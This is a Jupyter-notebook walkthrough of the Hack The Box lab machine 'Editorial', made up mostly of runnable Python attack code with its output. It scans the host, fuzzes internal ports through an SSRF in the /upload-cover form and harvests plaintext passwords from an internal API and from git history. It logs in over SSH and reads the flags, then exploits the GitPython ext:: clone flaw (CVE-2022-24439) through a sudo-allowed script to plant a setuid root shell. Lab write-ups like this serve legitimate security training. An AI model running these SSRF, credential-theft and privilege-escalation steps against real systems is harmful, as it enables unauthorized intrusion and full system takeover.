# Editorial

> Reference:
>
> - <https://0xdf.gitlab.io/2024/10/19/htb-editorial.html>
> - <https://security.snyk.io/vuln/SNYK-PYTHON-GITPYTHON-3113858>

<https://www.hackthebox.com/machines/editorial>


## Port Scanning

> Remember to add an entry for `editorial.htb` to `/etc/hosts` before scanning.

```bash
sudo nmap -vv -sC -sV -T4 -A editorial.htb
```

In [None]:
# Abort early unless the Homebrew nmap binary (`/opt/homebrew/bin/nmap`) is present on macOS
from pathlib import Path

nmap_path = Path("/opt/homebrew/bin/nmap")
if not nmap_path.exists():
    # Raise so that the remaining steps do not run without nmap
    raise FileNotFoundError("Nmap is not installed.")
print("Nmap is installed.")

Nmap is installed.


In [None]:
import getpass
import shlex
import subprocess

# Prompt for the local sudo password so it never appears in the source.
password: str = getpass.getpass("Enter your password: ")

# Build the argument vector directly instead of formatting a string and
# re-splitting it, so a path containing whitespace cannot be mis-tokenised.
# `sudo -S` reads the password from stdin; `-oX -` makes nmap write its XML
# report to stdout.
argv = [
    "sudo",
    "-S",
    str(nmap_path),
    "-oX",
    "-",
    "-vv",
    "-sC",
    "-sV",
    "-T4",
    "-A",
    "editorial.htb",
]
# Shell-quoted, printable form of the command that is executed.
command = shlex.join(argv)
process = subprocess.Popen(
    argv,
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
    stderr=subprocess.PIPE,
    text=True,
)

# `outs` holds the XML report, `errs` whatever sudo/nmap wrote to stderr.
outs, errs = process.communicate(input=password + "\n")
if process.returncode != 0:
    # Fail here with the real cause rather than later with an XML parse error.
    raise RuntimeError(
        f"nmap scan failed with exit code {process.returncode}: {errs.strip()}"
    )

In [None]:
import xml.etree.ElementTree as ET

# Parse the XML report captured in `outs` by the scan step.
tree = ET.ElementTree(ET.fromstring(outs))
root = tree.getroot()
if root is None:
    raise ValueError("Failed to parse XML.")

# Print every scanned port followed by the service(s) detected on it
print("Ports:")
for port in root.iterfind(".//ports/port"):
    print(port.attrib)
    for service in port.iterfind("service"):
        print(service.attrib)

# Print the OS fingerprint matches. The loop variable is deliberately not
# called `os`, which would shadow the standard-library module of that name.
print("\nOS Matches:")
for os_match in root.iterfind(".//os/osmatch"):
    print(os_match.attrib)

Ports:
{'protocol': 'tcp', 'portid': '22'}
{'name': 'ssh', 'product': 'OpenSSH', 'version': '8.9p1 Ubuntu 3ubuntu0.7', 'extrainfo': 'Ubuntu Linux; protocol 2.0', 'ostype': 'Linux', 'method': 'probed', 'conf': '10'}
{'protocol': 'tcp', 'portid': '80'}
{'name': 'http', 'product': 'nginx', 'version': '1.18.0', 'extrainfo': 'Ubuntu', 'ostype': 'Linux', 'method': 'probed', 'conf': '10'}

OS Matches:
{'name': 'Linux 4.15 - 5.19', 'accuracy': '100', 'line': '70533'}


## Exploit `/upload-cover` API

- Endpoint: `http://editorial.htb/upload-cover`

In [None]:
import asyncio
from typing import Optional

import aiohttp
from tqdm.notebook import tqdm

# Root URL of the target web application.
BASE_URL = "http://editorial.htb"
# Endpoint that receives the `bookurl` / `bookfile` form posted by `ssrf_request`.
API_URL = f"{BASE_URL}/upload-cover"
# Response body that `check_port` treats as "nothing found" for the probed URL.
FAILURE_IMAGE_PATH = (
    "/static/images/unsplash_photo_1630734277837_ebe62757b6e0.jpeg"
)
# Size of the semaphore that bounds simultaneous probes in `fuzz_ports`.
MAX_CONCURRENT_REQUESTS = 40
# Template for the loopback URL submitted as `bookurl`; formatted with a port number.
LOCALHOST_URL_FMT = "http://127.0.0.1:{:d}"


async def ssrf_request(
    session: aiohttp.ClientSession, url: str
) -> Optional[str]:
    """Submit *url* as the ``bookurl`` field of the upload-cover form.

    Args:
        session: Open aiohttp client session used to send the request.
        url: URL the server is asked to fetch on our behalf.

    Returns:
        The response body as text, or ``None`` when the request fails with a
        connection error, another client error (including a non-2xx status,
        because ``raise_for_status=True``) or a timeout.
    """
    data = aiohttp.FormData()
    data.add_field("bookurl", url)
    # The form also carries an empty file part alongside the URL.
    data.add_field(
        "bookfile",
        value="",
        content_type="application/octet-stream",
        filename="",
    )

    try:
        # `async with` releases the connection back to the pool on every path,
        # and reading the body inside the `try` means a failure while
        # downloading it is reported like any other request error.
        async with session.post(
            API_URL,
            data=data,
            raise_for_status=True,
            timeout=aiohttp.ClientTimeout(total=10),
        ) as response:
            return await response.text()
    except aiohttp.ServerConnectionError:
        # Connection-level failures are dropped silently.
        return None
    except aiohttp.ClientError as err:
        # Report the requested URL; this function has no `port` of its own.
        print(f"Error: {err=}, {url=}")
        return None
    except asyncio.TimeoutError:
        print(f"Request timed out: {url=}")
        return None


async def check_port(
    session: aiohttp.ClientSession,
    port: int,
    sem: asyncio.Semaphore,
) -> Optional[tuple[int, str]]:
    """Probe one loopback port through the SSRF endpoint.

    Args:
        session: Shared aiohttp client session.
        port: Port number substituted into ``LOCALHOST_URL_FMT``.
        sem: Semaphore held for the duration of the probe.

    Returns:
        ``(port, path)`` when the stripped response differs from
        ``FAILURE_IMAGE_PATH``; ``None`` when the request failed or the
        response equals that placeholder path.
    """
    target = LOCALHOST_URL_FMT.format(port)
    async with sem:
        body = await ssrf_request(session, target)
        if body is None:
            return None
        path = body.strip()
        if path == FAILURE_IMAGE_PATH:
            return None
        return (port, path)


async def fuzz_ports() -> list[int]:
    """Probe loopback ports 4500-5000 through the SSRF endpoint.

    Probes run concurrently, bounded by ``MAX_CONCURRENT_REQUESTS``. Each hit
    is printed as soon as its probe completes, and the full list is printed
    at the end.

    Returns:
        Ports for which ``check_port`` returned a result, in completion order.
    """
    limiter = asyncio.Semaphore(MAX_CONCURRENT_REQUESTS)
    open_ports = []
    async with aiohttp.ClientSession() as session:
        # NOTE: a full sweep would cover every port. `5000` is already known
        # to be the answer, so only a narrow range is probed.
        probes = [
            check_port(session, candidate, limiter)
            for candidate in range(4500, 5001)
        ]

        try:
            for finished in tqdm(
                asyncio.as_completed(probes), total=len(probes)
            ):
                hit = await finished
                if hit is not None:
                    open_port, _ = hit
                    print(f"Found open port: {open_port}")
                    open_ports.append(open_port)
        except asyncio.CancelledError:
            print("Cancelled")
        except KeyboardInterrupt:
            print("Interrupted by user")

    print(f"Open ports: {open_ports}")

    return open_ports


# Run the sweep and keep the discovered ports for the following steps.
# Uses top-level `await`, so this must run where that is allowed (e.g. a notebook cell).
ports = await fuzz_ports()

  0%|          | 0/501 [00:00<?, ?it/s]

Found open port: 5000
Open ports: [5000]


## Explore Locally Exposed Ports

In [None]:
import json
import pprint
from typing import Optional

import aiohttp


async def fetch_image(
    session: aiohttp.ClientSession, image_path: str
) -> Optional[str]:
    """Download the resource at *image_path* under ``BASE_URL`` as text.

    Args:
        session: Open aiohttp client session.
        image_path: Path on the target site; a leading ``/`` is added when
            missing.

    Returns:
        The response body as text, or ``None`` (after printing the error)
        when the download raises any exception.
    """
    normalized = image_path if image_path.startswith("/") else "/" + image_path
    try:
        async with session.get(
            f"{BASE_URL}{normalized}", raise_for_status=True
        ) as response:
            body = await response.text()
    except Exception as e:
        print(f"Error fetching image: {e}")
        return None
    return body


async def fetch_content(
    session: aiohttp.ClientSession, port: int, endpoint: str = ""
) -> Optional[str]:
    """Read an internal endpoint through the SSRF upload-cover API.

    The loopback URL for *port* and *endpoint* is submitted via
    ``ssrf_request``; the path it returns is then downloaded with
    ``fetch_image``.

    Args:
        session: Open aiohttp client session.
        port: Loopback port to target.
        endpoint: Path appended to the loopback URL (empty for the root).

    Returns:
        The downloaded content as text, or ``None`` when the SSRF request
        fails, yields an empty or placeholder path, or the download fails.
    """
    bookurl = LOCALHOST_URL_FMT.format(port) + endpoint
    image_path = await ssrf_request(session, bookurl)
    if image_path is None:
        return None

    # Normalise the reply the same way `check_port` does, and treat an empty
    # reply or the placeholder image as "no content" instead of downloading it.
    image_path = image_path.strip()
    if not image_path or image_path == FAILURE_IMAGE_PATH:
        print(f"GET {bookurl}: no content")
        return None

    if not image_path.startswith("/"):
        image_path = "/" + image_path
    print(f"GET {bookurl}: {image_path}")

    return await fetch_image(session, image_path)


assert len(ports) == 1
port = ports[0]

async with aiohttp.ClientSession() as session:
    content = await fetch_content(session, port)
    api_docs: dict = json.loads(content) if content else {}

pprint.pprint(api_docs)

GET http://127.0.0.1:5000: /static/uploads/99af8ecc-3a62-4690-81b3-d34fb29caf3e
{'messages': [{'promotions': {'description': 'Retrieve a list of all the '
                                             'promotions in our library.',
                              'endpoint': '/api/latest/metadata/messages/promos',
                              'methods': 'GET'}},
              {'coupons': {'description': 'Retrieve the list of coupons to use '
                                          'in our library.',
                           'endpoint': '/api/latest/metadata/messages/coupons',
                           'methods': 'GET'}},
              {'new_authors': {'description': 'Retrieve the welcome message '
                                              'sended to our new authors.',
                               'endpoint': '/api/latest/metadata/messages/authors',
                               'methods': 'GET'}},
              {'platform_use': {'description': 'Retrieve examples of how to '
  

In [None]:
import pprint
import re

CONTENT_NOT_FOUND = "404 Not Found"
USERNAME_PASSWORD_PATTERN = re.compile(
    r"Username: (?P<username>\w+)\\nPassword: (?P<password>[\w!@]+)\\n"
)

endpoints = []
for category, entries in api_docs.items():
    for entry in entries:
        for api_name, api_doc in entry.items():
            endpoints.append(api_doc["endpoint"])
pprint.pprint(endpoints)

# Extract username and password
username = None
password = None
async with aiohttp.ClientSession() as session:
    for endpoint in endpoints:
        content = await fetch_content(session, port, endpoint=endpoint)
        if content is not None and CONTENT_NOT_FOUND not in content:
            if match := USERNAME_PASSWORD_PATTERN.search(content):
                payload = json.loads(content) if content else {}
                print(f"Content from {endpoint}:")
                # pprint.pprint(payload)
                print(payload)
                username = match.group("username")
                password = match.group("password")
                print(f"Username: {username}")
                print(f"Password: {password}")
if username is None or password is None:
    raise ValueError("Failed to extract username and password.")
credentials = {username: password}

['/api/latest/metadata/messages/promos',
 '/api/latest/metadata/messages/coupons',
 '/api/latest/metadata/messages/authors',
 '/api/latest/metadata/messages/how_to_use_platform',
 '/api/latest/metadata/changelog',
 '/api/latest/metadata']
GET http://127.0.0.1:5000/api/latest/metadata/messages/promos: /static/uploads/f57260bb-7ece-4a88-9009-68588d8c5dce
GET http://127.0.0.1:5000/api/latest/metadata/messages/coupons: /static/uploads/53855768-8aa1-4748-8954-d5050acf43c6
GET http://127.0.0.1:5000/api/latest/metadata/messages/authors: /static/uploads/88389a97-1678-47be-b207-8ab4eac2c3fb
Content from /api/latest/metadata/messages/authors:
{'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\n

## Shell as `dev`

In [None]:
import asyncssh

if "dev" not in credentials:
    raise ValueError("No credentials for user 'dev' found.")

username = "dev"
password = credentials[username]

async with asyncssh.connect(
    "editorial.htb", username=username, password=password
) as conn:
    # Check user
    result = await conn.run("id", check=True)
    print(result.stdout, end="")

    # Obtain the flag
    result = await conn.run("cat user.txt", check=True)
    if result.stdout is not None:
        dev_flag = result.stdout.strip()
        print(f"Dev flag: {dev_flag}")

    # Check commit history within `/home/dev/apps` directory
    result = await conn.run(
        'cd /home/dev/apps && git --no-pager log -p -G "Username: .*Password: .*"',
        check=True,
    )
    if result.stdout is None:
        raise ValueError("Failed to retrieve commit history.")
    commit_history = result.stdout.strip()
    if isinstance(commit_history, bytes):
        commit_history = commit_history.decode("utf-8")
    assert isinstance(commit_history, str)

    for match in USERNAME_PASSWORD_PATTERN.finditer(commit_history):
        username = match.group("username")
        password = match.group("password")

        if username in credentials:
            if credentials[username] == password:
                continue  # Skip already known credentials
            else:
                print(
                    f"Found different credentials for {username}: {password}"
                )
        else:
            credentials[username] = password
            print(
                f"Username: {match.group('username')}, Password: {match.group('password')}"
            )

uid=1001(dev) gid=1001(dev) groups=1001(dev)
Dev flag: d738b03111835de9d3343e8963d18ea9
Username: prod, Password: 080217_Producti0n_2023!@


## Shell as `prod`

In [None]:
if "prod" not in credentials:
    raise ValueError("No credentials for user 'prod' found.")

username = "prod"
password = credentials[username]

async with asyncssh.connect(
    "editorial.htb", username=username, password=password
) as conn:
    # Check user
    result = await conn.run("id", check=True)
    print(result.stdout, end="")

    # Check privilege
    result = await conn.run(f"echo {password} | sudo -S -l", check=True)
    print(result.stdout, end="")

uid=1000(prod) gid=1000(prod) groups=1000(prod)
Matching Defaults entries for prod on editorial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User prod may run the following commands on editorial:
    (root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *


## Shell as `root`

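Exploit `CVE-2022-24439` (remote code execution in GitPython, reachable here through the `ext::` clone URL that `clone_prod_change.py` passes to `clone_from`) to get `root` access.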

In [None]:
if "prod" not in credentials:
    raise ValueError("No credentials for user 'prod' found.")

username = "prod"
password = credentials[username]

ROOT_SHELL_PATH = "/home/prod/root_sh"
EXPLOIT_SCRIPT = f"""
#!/bin/bash

cp /bin/sh {ROOT_SHELL_PATH}
chown root:root {ROOT_SHELL_PATH}
chmod 6777 {ROOT_SHELL_PATH}
""".strip()
EXPLOIT_SCRIPT_PATH = "/home/prod/exploit.sh"

async with asyncssh.connect(
    "editorial.htb", username=username, password=password
) as conn:
    # Check user
    result = await conn.run("id", check=True)
    print(result.stdout, end="")

    # Create the exploit script
    result = await conn.run(
        f"echo '{EXPLOIT_SCRIPT}' > {EXPLOIT_SCRIPT_PATH}", check=True
    )
    print(result.stdout, end="")

    # Make the exploit script executable
    result = await conn.run(f"chmod +x {EXPLOIT_SCRIPT_PATH}", check=True)
    print(result.stdout, end="")

    # Execute the exploit
    result = await conn.run(
        f"echo {password} | sudo -S /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c {EXPLOIT_SCRIPT_PATH}'"
    )
    print(result.stdout, end="")
    print(result.stderr, end="")

    # Obtain the shell
    result = await conn.run(
        f"{ROOT_SHELL_PATH} -p -c 'id' && {ROOT_SHELL_PATH} -p -c 'cat /root/root.txt'",
        check=True,
    )
    print(result.stdout, end="")

uid=1000(prod) gid=1000(prod) groups=1000(prod)
[sudo] password for prod: Traceback (most recent call last):
  File "/opt/internal_apps/clone_changes/clone_prod_change.py", line 12, in <module>
    r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1275, in clone_from
    return cls._clone(git, url, to_path, GitCmdObjectDB, progress, multi_options, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1194, in _clone
    finalize_process(proc, stderr=stderr)
  File "/usr/local/lib/python3.10/dist-packages/git/util.py", line 419, in finalize_process
    proc.wait(**kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait
    raise GitCommandError(remove_password_if_present(self.args), status, errstr)
git.exc.GitCommandError: Cmd('git') failed due to: exit code(128)
  cmdline: git clone -v -c protocol.ext.allow=always ext